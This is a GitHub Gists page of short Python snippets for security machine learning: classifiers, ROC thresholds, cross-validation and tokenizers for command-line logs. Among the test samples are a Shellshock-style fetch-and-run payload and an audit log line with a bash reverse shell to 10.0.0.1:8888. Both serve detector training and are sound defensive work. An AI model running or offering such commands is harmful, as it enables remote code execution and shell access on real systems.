Dmitrijs Trizna (dtrizna): GitHub Gists
import re

def normalizeStringHash(string):
    # Replace hex digests with placeholder tokens; longest pattern first,
    # so a SHA-256 is not consumed piecemeal by the shorter patterns.
    string = re.sub(r'[0-9a-fA-F]{64}', "<sha256>", string)
    string = re.sub(r'[0-9a-fA-F]{40}', "<sha1>", string)
    string = re.sub(r'[0-9a-fA-F]{32}', "<md5>", string)
    return string
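A quick check on a made-up scan line (the input string is illustrative, not from the gist):

print(normalizeStringHash("scan d41d8cd98f00b204e9800998ecf8427e OK"))
# scan <md5> OK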
@dtrizna
dtrizna / gradient_accumulation.py
Created March 5, 2023 18:22 — forked from thomwolf/gradient_accumulation.py
PyTorch gradient accumulation training loop
model.zero_grad()                                   # Reset gradients tensors
for i, (inputs, labels) in enumerate(training_set):
    predictions = model(inputs)                     # Forward pass
    loss = loss_function(predictions, labels)       # Compute loss function
    loss = loss / accumulation_steps                # Normalize our loss (if averaged)
    loss.backward()                                 # Backward pass
    if (i+1) % accumulation_steps == 0:             # Wait for several backward steps
        optimizer.step()                            # Now we can do an optimizer step
        model.zero_grad()                           # Reset gradients tensors
        if (i+1) % evaluation_steps == 0:           # Evaluate the model when we...
            evaluate_model()                        # ...have no gradients accumulated
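The loop assumes model, optimizer, loss_function, training_set, accumulation_steps and evaluation_steps already exist; a hypothetical setup, just to make the snippet self-contained (every value here is an assumption):

import torch

model = torch.nn.Linear(10, 2)                       # hypothetical toy model
optimizer = torch.optim.SGD(model.parameters(), lr=0.01)
loss_function = torch.nn.CrossEntropyLoss()
accumulation_steps, evaluation_steps = 4, 100        # assumed values
training_set = [(torch.randn(8, 10), torch.randint(0, 2, (8,))) for _ in range(200)]
def evaluate_model(): pass                           # placeholder for a real eval pass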
from sklearn.neural_network import MLPClassifier

X_full_dataset = [...]
y_full_dataset = [...]

mlpModel = MLPClassifier(
    hidden_layer_sizes=(128, 64)
)
mlpModel.fit(X_full_dataset, y_full_dataset)
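To see the classifier run end to end, here is a minimal sketch on synthetic data (make_classification and all parameter values are illustrative, not from the gist):

from sklearn.datasets import make_classification
from sklearn.neural_network import MLPClassifier

X_demo, y_demo = make_classification(n_samples=500, n_features=20, random_state=0)
clf = MLPClassifier(hidden_layer_sizes=(128, 64), max_iter=300, random_state=0)
clf.fit(X_demo, y_demo)
print(clf.score(X_demo, y_demo))  # training accuracy, just a sanity check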
import numpy as np
from sklearn.metrics import roc_curve, det_curve

def get_threshold_from_rate(thresholds, rate_array, rate):
    # First threshold at which the target rate (e.g. TPR or FPR) is reached
    index = np.where(rate_array >= rate)[0][0]
    return thresholds[index]

def get_value_from_threshold(values, thresholds, threshold):
    try:
        # roc_curve returns thresholds in decreasing order, so this picks
        # the first one at or below the requested threshold
        thr_index = np.where(thresholds <= threshold)[0][0]
    except IndexError:
        thr_index = -1  # assumed fallback: no such threshold, take the last one
    return values[thr_index]
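Continuing the snippet above, a hedged usage sketch on random scores (the 1% FPR target is an illustrative choice):

y_true = np.random.randint(0, 2, 1000)
y_score = np.random.rand(1000)
fpr, tpr, thresholds = roc_curve(y_true, y_score)
thr = get_threshold_from_rate(thresholds, fpr, 0.01)
print(f"threshold @ 1% FPR: {thr:.3f}, TPR there: {get_value_from_threshold(tpr, thresholds, thr):.3f}")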
from xgboost import XGBClassifier

xgb_model = XGBClassifier(n_estimators=100, use_label_encoder=False, eval_metric="logloss")
xgb_model.fit(
    X["HashingVectorizer"], y
)

# Shellshock-style reverse-shell payload used as a malicious test sample
shellshock_backdoor = "() { :;}; /bin/bash -c 'curl -O /tmp/foo.sh example.com/test; nohup bash /tmp/foo.sh &'"
print(xgb_model.predict_proba(
    hvwpt.transform([shellshock_backdoor])
))
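predict_proba returns a (1, 2) array of class probabilities here; assuming label 1 marks malicious commands, the second column is the score of interest.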
import numpy as np
from sklearn.model_selection import cross_validate
from sklearn.model_selection import StratifiedKFold

def print_scores(cv):
    # Average every test metric over all folds
    means = np.mean(list(cv.values()), axis=1)
    for name, mean in zip(cv.keys(), means):
        if "test_" in name:
            # removeprefix, not strip: strip() drops characters, not a prefix
            print(f"\tAverage {name.removeprefix('test_'):<10} over all folds: {mean:.2f}")
    print()

cv = {}
metrics = ["accuracy", "precision", "recall", "f1", "roc_auc"]
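A hedged sketch of how these pieces could fit together, reusing xgb_model and the feature matrix from the earlier snippet (the fold count and random_state are assumptions, not part of the gist):

skf = StratifiedKFold(n_splits=5, shuffle=True, random_state=42)
cv = cross_validate(xgb_model, X["HashingVectorizer"], y, cv=skf, scoring=metrics)  # fills the cv dict above
print_scores(cv)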
type=EXECVE msg=audit(1648469217.476:296): argc=2 a0="readlink" a1="/usr/bin/python"
type=EXECVE msg=audit(1648469217.484:298): argc=4 a0="grep" a1="-q" a2="^ID.*=.*ubuntu" a3="/etc/os-release"
type=EXECVE msg=audit(1648469217.512:299): argc=3 a0="tput" a1="setaf" a2="1"
type=EXECVE msg=audit(1648469218.312:300): argc=4 a0="/bin/sh" a1="-c" a3="/bin/sh -c /bin/bash -i \u003e\u0026 /dev/tcp/10.0.0.1/8888 0\u003e\u00261"
type=EXECVE msg=audit(1648469219.440:302): argc=3 a0="/usr/lib/x86_64-linux-gnu/utempter/utempter" a1="add" a2="tmux(3353).%1"
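Raw EXECVE records like these are the pipeline's input; a hedged sketch (the helper name is mine) of flattening the aN arguments back into a command line:

import re

def execve_to_cmdline(record):
    # Collect the quoted aN values in their order of appearance
    return " ".join(re.findall(r'a\d+="([^"]*)"', record))

line = 'type=EXECVE msg=audit(1648469217.484:298): argc=4 a0="grep" a1="-q" a2="^ID.*=.*ubuntu" a3="/etc/os-release"'
print(execve_to_cmdline(line))  # grep -q ^ID.*=.*ubuntu /etc/os-release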
import re
from nltk.tokenize import WordPunctTokenizer
from sklearn.feature_extraction.text import HashingVectorizer

wpt = WordPunctTokenizer()
hvwpt = HashingVectorizer(
    # Mask IPv4 addresses so the model generalizes across hosts
    preprocessor=lambda x: re.sub(r"(?:[0-9]{1,3}\.){3}[0-9]{1,3}", "_IPADDRESS_", x),
    tokenizer=wpt.tokenize,
    token_pattern=None,   # silence the "token_pattern is ignored" warning
    lowercase=False,
)
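A quick check that the vectorizer masks IPs before hashing (the sample command is illustrative):

vec = hvwpt.transform(["bash -i >& /dev/tcp/10.0.0.1/8888 0>&1"])
print(vec.shape)  # (1, 1048576): HashingVectorizer's default 2**20 feature space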
{
    "program_name": "auditbeat",
    "hostname": "k8s-minikube",
    "...",
    "auditd": {
        "message_type": "syscall",
        "summary": {
            "actor": {
                "primary": "root",
                "secondary": "root"
import random
import string
import time

def get_random_ip(octets=4):
    # Dotted-quad address with each octet drawn uniformly from 0-255
    return ".".join(map(str, (random.randint(0, 255) for _ in range(octets))))

def get_random_string(length=10):
    # Lowercase alphanumeric string of the requested length
    return "".join(random.choice(string.ascii_lowercase + string.digits) for _ in range(length))